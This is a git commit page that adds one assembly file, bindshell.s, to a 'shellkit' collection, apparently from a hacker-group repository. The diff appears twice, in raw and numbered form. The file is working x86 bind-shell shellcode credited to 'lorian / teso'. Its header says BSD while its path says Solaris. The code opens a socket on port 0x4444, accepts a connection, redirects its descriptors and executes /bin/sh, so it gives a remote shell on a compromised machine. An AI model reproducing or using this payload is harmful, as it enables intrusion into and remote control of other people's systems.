initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_solaris/bindshell.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 68 insertions, 0 deletions
diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s
new file mode 100644
index 0000000..1380747
--- /dev/null
+++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
+/* x86/BSD bindsh shellcode (89 bytes)
+   
+   lorian / teso
+*/
+        .globl  _cbegin
+        .globl  cbegin
+        .globl  _cend
+        .globl  cend
+_cbegin:
+cbegin:
+        movl    $0x3cfff8ff, %eax
+        notl    %eax
+        pushl   %eax
+        xorl    %ebx, %ebx
+        mull    %ebx
+        movb    $0x9a, %al
+        pushl   %eax
+        movl    %esp, %ecx
+        
+        pushl   %ebx
+        incl    %ebx
+        pushl   %ebx
+        incl    %ebx
+        pushl   %ebx
+        movb    $0xe6, %al
+        call    *%ecx
+        xchgl   %esi, %eax
+        pushl   %edx
+        pushw   $0x4444
+        pushw   %bx
+        movl    %esp, %ebp
+        pushl   $0x10
+        pushl   %ebp
+        pushl   %esi
+        xorl    %eax, %eax
+        movb    $0xe8, %al
+        call    *%ecx
+        movb    $0xe9, %al
+        call    *%ecx
+        pusha
+        popl    %edi
+        movb    $0xea, %al
+        call    *%ecx
+a:      
+        pushl   %ebx
+        pushl   %eax
+        movb    $0x3e, %al
+        call    *%ecx
+        decl    %ebx
+        jns     a
+        pushl   %edx
+        push    $0x68732F6E
+        push    $0x69622F2F
+        movl    %esp, %ebx
+        pushl   %edx
+        pushl   %ebx
+        movl    %esp, %edi
+        pushl   %edx
+        pushl   %edi
+        pushl   %ebx
+        movb    $0x3b, %al
+        call    *%ecx
+                                                        
+_cend:
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_solaris/bindshell.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s new file mode 100644 index 0000000..1380747 --- /dev/null +++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
	1	/* x86/BSD bindsh shellcode (89 bytes)
	2
	3	lorian / teso
	4	*/
	5
	6	.globl _cbegin
	7	.globl cbegin
	8	.globl _cend
	9	.globl cend
	10
	11	_cbegin:
	12	cbegin:
	13	movl $0x3cfff8ff, %eax
	14	notl %eax
	15	pushl %eax
	16	xorl %ebx, %ebx
	17	mull %ebx
	18	movb $0x9a, %al
	19	pushl %eax
	20	movl %esp, %ecx
	21
	22	pushl %ebx
	23	incl %ebx
	24	pushl %ebx
	25	incl %ebx
	26	pushl %ebx
	27	movb $0xe6, %al
	28	call *%ecx
	29
	30	xchgl %esi, %eax
	31	pushl %edx
	32	pushw $0x4444
	33	pushw %bx
	34	movl %esp, %ebp
	35	pushl $0x10
	36	pushl %ebp
	37	pushl %esi
	38	xorl %eax, %eax
	39	movb $0xe8, %al
	40	call *%ecx
	41	movb $0xe9, %al
	42	call *%ecx
	43	pusha
	44	popl %edi
	45	movb $0xea, %al
	46	call *%ecx
	47	a:
	48	pushl %ebx
	49	pushl %eax
	50	movb $0x3e, %al
	51	call *%ecx
	52	decl %ebx
	53	jns a
	54	pushl %edx
	55	push $0x68732F6E
	56	push $0x69622F2F
	57	movl %esp, %ebx
	58	pushl %edx
	59	pushl %ebx
	60	movl %esp, %edi
	61	pushl %edx
	62	pushl %edi
	63	pushl %ebx
	64	movb $0x3b, %al
	65	call *%ecx
	66
	67	_cend:
	68	cend: